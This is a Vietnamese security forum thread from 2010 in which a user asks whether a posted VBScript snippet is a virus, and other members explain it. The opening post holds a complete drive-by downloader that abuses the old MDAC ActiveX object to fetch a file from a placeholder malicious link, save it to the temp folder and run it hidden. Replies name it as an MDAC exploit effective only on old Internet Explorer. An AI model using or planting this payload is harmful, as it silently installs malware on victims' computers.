English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thảo luận virus, trojan, spyware, worm... Đoạn code này có phải virus  XML
  [Question]   Đoạn code này có phải virus 25/06/2010 08:04:37 (+0700) | #1 | 214016
[Avatar]
 MinhNguyenQuang75
Member
[Minus]    0    [Plus]
Joined: 06/03/2010 06:42:35
Messages: 43
Offline
[Profile] [PM]
Code:
<script language="VBScript">
    on error resume next
    dl = "Link trang web độc muốn nạn nhân dính trưởng"
    Set df = document.createElement("object")
    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    str="Microsoft.XMLHTTP"
    Set x = df.CreateObject(str,"")
    a1="Ado"
    a2="db."
    a3="Str"
    a4="eam"
    str1=a1&a2&a3&a4
    str5=str1
    set S = df.createobject(str5,"")
    S.type = 1
    str6="GET"
    x.Open str6, dl, False
    x.Send
    fname1="bl4ck.com"
    set F = df.createobject("Scripting.FileSystemObject","")
    set tmp = F.GetSpecialFolder(2)
    fname1= F.BuildPath(tmp,fname1)
    S.open
    S.write x.responseBody
    S.savetofile fname1,2
    S.close
    set Q = df.createobject("Shell.Application","")
    Q.ShellExecute fname1,"","","open",0
    </script>
[Up] [Print Copy]
  [Question]   Đoạn code này có phải virus 25/06/2010 09:17:15 (+0700) | #2 | 214025
[Avatar]
 kekhocdoi
Member
[Minus]    0    [Plus]
Joined: 15/09/2009 09:45:05
Messages: 168
Offline
[Profile] [PM] [Email] [Yahoo!]
dl = "Link trang web độc muốn nạn nhân dính trưởng"
Đọc cái này thì còn phải hỏismilie
Rất vui được làm quen, học hỏi, trao đổi,.. với tất cả mọi người
[Up] [Print Copy]
  [Question]   Đoạn code này có phải virus 25/06/2010 10:07:34 (+0700) | #3 | 214028
[Avatar]
 MinhNguyenQuang75
Member
[Minus]    0    [Plus]
Joined: 06/03/2010 06:42:35
Messages: 43
Offline
[Profile] [PM]

kekhocdoi wrote:
dl = "Link trang web độc muốn nạn nhân dính trưởng"
Đọc cái này thì còn phải hỏismilie 

tuy là vậy nhưng cả đoạn này có khả năng lây nhiễm k?
[Up] [Print Copy]
  [Question]   Đoạn code này có phải virus 28/06/2010 16:01:08 (+0700) | #4 | 214195
hackertam1995
Member
[Minus]    0    [Plus]
Joined: 15/09/2009 19:41:30
Messages: 7
Offline
[Profile] [PM]
muon thu cu cho vao viet code vao notepad zui chay may ao xem sao?
[Up] [Print Copy]
  [Question]   Đoạn code này có phải virus 28/06/2010 19:17:13 (+0700) | #5 | 214203
[Avatar]
 bolzano_1989
Journalist
[Minus]    0    [Plus]
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
[Profile] [PM]
Mấy giờ rồi mà còn hi vọng câu nạn nhân bằng cái MDAC exploit này ?
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]
  [Question]   Đoạn code này có phải virus 01/07/2010 19:57:50 (+0700) | #6 | 214423
[Avatar]
 ngocvuxxl
Member
[Minus]    0    [Plus]
Joined: 25/05/2009 00:23:40
Messages: 8
Offline
[Profile] [PM]
cái này giống code chèn keylog vào web.
"Link trang web độc muốn nạn nhân dính trưởng" thay cái này = link con keylog.
thấy wen wen, chắc thế.
Chặn FB được, sao không chặn LX??
[Up] [Print Copy]
  [Question]   Đoạn code này có phải virus 03/07/2010 17:47:00 (+0700) | #7 | 214578
[Avatar]
 MinhNguyenQuang75
Member
[Minus]    0    [Plus]
Joined: 06/03/2010 06:42:35
Messages: 43
Offline
[Profile] [PM]

ngocvuxxl wrote:
cái này giống code chèn keylog vào web.
"Link trang web độc muốn nạn nhân dính trưởng" thay cái này = link con keylog.
thấy wen wen, chắc thế. 

Con này là sality đấy, em phân tích xong thấy nó là lạ, code nghèo nàn thế này thì có lây nhiễm dc k
[Up] [Print Copy]
  [Question]   Đoạn code này có phải virus 03/07/2010 19:37:06 (+0700) | #8 | 214579
LlizKy
Member
[Minus]    0    [Plus]
Joined: 12/05/2010 02:29:08
Messages: 1
Offline
[Profile] [PM]
mã để gắn zô web lấy nhiễm virut đó mà...
[Up] [Print Copy]
  [Question]   Đoạn code này có phải virus 04/07/2010 08:03:01 (+0700) | #9 | 214602
[Avatar]
 MinhNguyenQuang75
Member
[Minus]    0    [Plus]
Joined: 06/03/2010 06:42:35
Messages: 43
Offline
[Profile] [PM]

LlizKy wrote:
mã để gắn zô web lấy nhiễm virut đó mà...  

Vậy đây chưa phải virus thực à, sau khi kết nối tới địa chỉ kia thì virus thực mới dc download về à. Gian thật, bonnj virus cũng ranh ma thật
[Up] [Print Copy]
  [Question]   Đoạn code này có phải virus 05/07/2010 09:57:01 (+0700) | #10 | 214665
[Avatar]
 tmd
Member
[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]

MinhNguyenQuang75 wrote:

ngocvuxxl wrote:
cái này giống code chèn keylog vào web.
"Link trang web độc muốn nạn nhân dính trưởng" thay cái này = link con keylog.
thấy wen wen, chắc thế. 

Con này là sality đấy, em phân tích xong thấy nó là lạ, code nghèo nàn thế này thì có lây nhiễm dc k 

Bạn cần phân tích bằng google để xem người ta nói cái đoạn bạn post lên diễn đàn là gì. COde nó nghèo nàn mà bạn phát biểu vậy, thật bái phục bạn.
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Up] [Print Copy]
  [Question]   Đoạn code này có phải virus 10/07/2010 07:28:53 (+0700) | #11 | 215002
[Avatar]
 MinhNguyenQuang75
Member
[Minus]    0    [Plus]
Joined: 06/03/2010 06:42:35
Messages: 43
Offline
[Profile] [PM]

tmd wrote:

MinhNguyenQuang75 wrote:

ngocvuxxl wrote:
cái này giống code chèn keylog vào web.
"Link trang web độc muốn nạn nhân dính trưởng" thay cái này = link con keylog.
thấy wen wen, chắc thế. 

Con này là sality đấy, em phân tích xong thấy nó là lạ, code nghèo nàn thế này thì có lây nhiễm dc k 

Bạn cần phân tích bằng google để xem người ta nói cái đoạn bạn post lên diễn đàn là gì. COde nó nghèo nàn mà bạn phát biểu vậy, thật bái phục bạn. 

Phân tích bằng google kiểu gì vậy? Bạn cao thủ quá smilie smilie. Con này tên gốc là gai xinh.exe đó
[Up] [Print Copy]
  [Question]   Đoạn code này có phải virus 10/07/2010 17:33:25 (+0700) | #12 | 215036
[Avatar]
 bolzano_1989
Journalist
[Minus]    0    [Plus]
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
[Profile] [PM]

MinhNguyenQuang75 wrote:

tmd wrote:

MinhNguyenQuang75 wrote:

ngocvuxxl wrote:
cái này giống code chèn keylog vào web.
"Link trang web độc muốn nạn nhân dính trưởng" thay cái này = link con keylog.
thấy wen wen, chắc thế. 

Con này là sality đấy, em phân tích xong thấy nó là lạ, code nghèo nàn thế này thì có lây nhiễm dc k 

Bạn cần phân tích bằng google để xem người ta nói cái đoạn bạn post lên diễn đàn là gì. COde nó nghèo nàn mà bạn phát biểu vậy, thật bái phục bạn. 

Phân tích bằng google kiểu gì vậy? Bạn cao thủ quá smilie smilie. Con này tên gốc là gai xinh.exe đó 


Về Bkav forum mà hỏi ấy, bạn LoveRap.
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]
  [Question]   Đoạn code này có phải virus 13/07/2010 11:27:40 (+0700) | #13 | 215235
[Avatar]
 MinhNguyenQuang75
Member
[Minus]    0    [Plus]
Joined: 06/03/2010 06:42:35
Messages: 43
Offline
[Profile] [PM]

bolzano_1989 wrote:

MinhNguyenQuang75 wrote:

tmd wrote:

MinhNguyenQuang75 wrote:

ngocvuxxl wrote:
cái này giống code chèn keylog vào web.
"Link trang web độc muốn nạn nhân dính trưởng" thay cái này = link con keylog.
thấy wen wen, chắc thế. 

Con này là sality đấy, em phân tích xong thấy nó là lạ, code nghèo nàn thế này thì có lây nhiễm dc k 

Bạn cần phân tích bằng google để xem người ta nói cái đoạn bạn post lên diễn đàn là gì. COde nó nghèo nàn mà bạn phát biểu vậy, thật bái phục bạn. 

Phân tích bằng google kiểu gì vậy? Bạn cao thủ quá smilie smilie. Con này tên gốc là gai xinh.exe đó 


Về Bkav forum mà hỏi ấy, bạn LoveRap. 

LoveRap là anh tớ smilie smilie
bolzano là cái đồ sống 2 mặt
Thảo nào cái avarta, ha ha ha
[Up] [Print Copy]
  [Question]   Đoạn code này có phải virus 29/07/2010 19:52:18 (+0700) | #14 | 216815
huyannet
Member
[Minus]    0    [Plus]
Joined: 21/07/2008 00:42:51
Messages: 83
Offline
[Profile] [PM]
Con này đích thực là virus, nó tự động tải file virus về máy theo đường link chủ topic ghi.
Còn lây nhiễm được hay không thì tuỳ thuộc vào con virus tải về thuộc loại nào.
Con này lâu lắm rồi, chỉ phát huy tác dụng trên các IE phiên bản cũ.
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|